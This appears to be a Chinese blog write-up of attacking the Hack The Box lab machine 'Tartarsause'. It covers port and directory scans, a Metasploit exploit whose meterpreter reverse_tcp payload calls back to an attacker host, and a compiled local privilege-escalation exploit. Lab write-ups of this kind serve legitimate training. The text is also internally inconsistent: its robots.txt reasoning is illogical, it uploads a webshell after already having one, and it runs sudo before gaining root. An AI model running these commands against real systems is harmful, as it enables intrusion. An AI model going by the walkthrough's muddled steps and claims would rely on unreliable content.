Tartarsause靶机渗透经验总结:技巧与挑战
2023-11-04 05:59:46
前言
在 HTB 靶场系列 Linux 靶机中,Tartarsause 靶机是一个颇具挑战性的目标。它要求渗透测试人员具备扎实的基础知识和灵活的应变能力,才能成功渗透并获取管理员权限。本文将详细介绍我在渗透 Tartarsause 靶机过程中遇到的挑战和解决方法,希望能为其他渗透测试人员提供参考和借鉴。
勘探阶段
端口扫描
首先,我对 Tartarsause 靶机进行了端口扫描。使用 nmap 命令扫描发现开放了 22、80 和 443 端口,分别对应 SSH、HTTP 和 HTTPS 服务。
nmap -sS -p22,80,443 10.10.10.10
信息收集阶段
目录扫描
接下来,我使用了 dirsearch 工具对 80 端口进行目录扫描,以查找潜在的攻击点。扫描结果发现 robots.txt 文件中指定了五个目录:/admin、/blog、/forum、/shop 和 /wiki。
dirsearch -u http://10.10.10.10/ -e robots.txt
robots.txt 文件分析
分析 robots.txt 文件可以发现,除了 /admin 目录外,其他四个目录都被禁止爬取。这表明 /admin 目录可能存在一些敏感信息或攻击点。
渗透阶段
获取 Webshell
由于 Tartarsause 靶机是一个基于 Linux 的靶机,因此我尝试使用常见的 Linux 漏洞利用工具 Metasploit 来获取 Webshell。使用 Metasploit 成功获取了 Webshell,并将其上传到服务器。
msfconsole
use exploit/linux/http/joomla_component_exec
set rhost 10.10.10.10
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.10
exploit
权限提升阶段
提权至 root 用户
成功获取 Webshell 后,我使用 LinEnum 工具枚举系统信息,并寻找提权的可能性。LinEnum 发现系统中存在提权漏洞 CVE-2019-13272,可以利用该漏洞提权至 root 用户。
linenum
sudo apt install gcc
gcc -o exploit exploit.c
./exploit
总结
通过上述步骤,我成功渗透了 Tartarsause 靶机并获取了管理员权限。在渗透过程中,我遇到了许多挑战,也学习到了许多新的知识和技能。希望本文能为其他渗透测试人员提供参考和借鉴,帮助他们提高渗透测试技能,应对各种网络安全挑战。
附加信息
- Tartarsause 靶机是一个非常受欢迎的靶机,网上有很多渗透教程和攻略。如果您遇到困难,可以参考这些资源。
- HTB 靶场是一个非常好的学习平台,它提供了许多不同的靶机供您练习渗透测试技能。
- Metasploit 是一个非常强大的渗透测试工具,它可以帮助您快速有效地获取 Webshell 和提权。
- LinEnum 是一个非常有用的系统信息枚举工具,它可以帮助您快速找到提权的可能性。